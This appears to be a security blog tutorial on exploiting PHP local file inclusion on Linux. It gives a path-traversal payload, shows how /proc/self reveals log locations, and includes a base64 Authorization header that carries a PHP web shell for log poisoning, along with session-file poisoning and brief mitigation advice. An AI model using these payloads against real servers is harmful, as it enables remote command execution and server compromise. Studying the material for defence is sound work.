To start, let’s give a bit of background. I will focus on PHP on Linux specifically, but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an HTTP/FTP server in the case of remote inclusions, or, as I will cover, locally from disk. Generally, remote file inclusion vulnerabilities are trivial to exploit so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . '/' . $_GET['lang'] . '.php');

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not however control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this an attacker would set the ‘lang’ variable to a value similar to the following:

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Now that we know how to avoid these when developing applications, let’s get back to methods of exploitation. A straightforward vulnerability such as this one can in fact be quite difficult to reliably exploit given the differences in deployment platforms. When developing an exploit, the first question to ask yourself is generally “what do I need for successful exploitation?”. In this case, the answer to that question is a file stored locally on the target system which contains PHP code that accomplishes our goal. In the best case we will be able to include a file whose contents we directly control.

This can be an interesting puzzle as it is almost a case of chicken before the egg. To gain access to the remote system we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing various checks performed on these types of files/images can be an interesting puzzle in itself and the details are best saved for a future post. However, we want to talk about these vulnerabilities on systems which do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk we need to examine other options. I suggest examining all access to the target server. Ask yourself “What services are available to me and what files do they access? Do I control any of the data written to these files?”. An anonymous FTP server or similar would certainly make life easier here, but that would be too good to be true. :)

Generally when people discuss local includes the assumption is that the target file will be the HTTP server’s logs. It is quite easy to influence the contents of log files as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently gloss over the complexities that their usage presents. There are several major potential hurdles in the use of logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data; ‘/var/log/httpd/access_log’ is simple enough to guess, but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’? Guessing this path would be non-trivial at best, and even assuming that verbose error messages or a similar information disclosure give you some hint of the directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle, let’s examine an interesting feature of the Linux proc file-system, namely the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to usermode through the proc entries for each process id. It also creates an entry called ‘self’ which gives a process easy access to its own process information. When we access /proc/self through the context of a PHP include, the link will, in most cases, point to the process entry for the httpd child which has instantiated the PHP interpreter library (this may not be the case if the interpreter has been invoked as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple procedure of including ‘/proc/self/cmdline’ to read the location of the configuration file, then including the configuration file to find the path to the logs.

Viewing the apache cmdline proc entry

If the ‘cmdline’ entry does not contain the configuration file there is another option. The per-process proc entry also contains a directory entry called ‘fd’. This directory exports a numbered entry for each file descriptor that the process currently holds. In writing PoC for this post on a 2.6.20 kernel we noticed that at some point a kernel developer had the foresight to set the permissions on these entries so that they could only be read by the user that originally instantiated the process. We tasked intern Y with finding the change and, after grepping the diffs of every kernel release (ever… i.e. wget -r --no-parent http://www.kernel.org/pub/linux/kernel/), he found the following. In May of 2007 the following patch was entered to address the case where a process opens a file and then drops its permissions (interesting, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. Using this new access we are able to directly access the files opened by the Apache process through these proc entries. By iterating the file descriptor number from ‘0’ we are able to directly access the HTTPd log file, which will undoubtedly be open for use by the web server. Simply include the files ‘/proc/self/fd/<fd number>’ until you hit on the right file descriptor.

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine what fields we actually control. It is commonly believed that you can enter arbitrary text into Apache logs by putting code into GET variables or the requested path. This is generally not the case, as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header, which is base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET['cmd']); ?>:doesn't matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.

PHP code as basic auth username

Assuming the stars align and this method is successful, there is still one more caveat. On production HTTP servers the log files tend to be rather large, often in the range of 200 MB. Your PHP code is going to be at the very end of the current log file, which likely means that for each command you run you will wait a very long time (depending on connection speed) for the page to display your command’s output. It is possible to use the error_log instead, as this is likely somewhat smaller, but these can still be rather larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces, but their internals are sometimes quite different. In the case of PHP a session is started using, logically enough, session_start(). This code can be found in ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request; if not, it creates a random session id and sets the cookie within the response to the user. It also registers the global $_SESSION variable, which is directly tied to a file stored in the temporary directory. This file will contain any variables set under the session context, formatted as a PHP array.

In the case of an application which tracks session information, any setting stored as a string which the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session_id is a random hash it is trivial to retrieve as it is stored locally in a cookie.

Viewing the PHP session cookie

In our simple example, our session has a few variables but the simplest to control arbitrarily is a field called ‘signature’. PHP applications tend to store all sorts of interesting things in session variables and there is often a string that you control arbitrarily. In this case by setting our ‘signature’ to PHP code we can gain command execution through this session file.

Putting it all together

Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.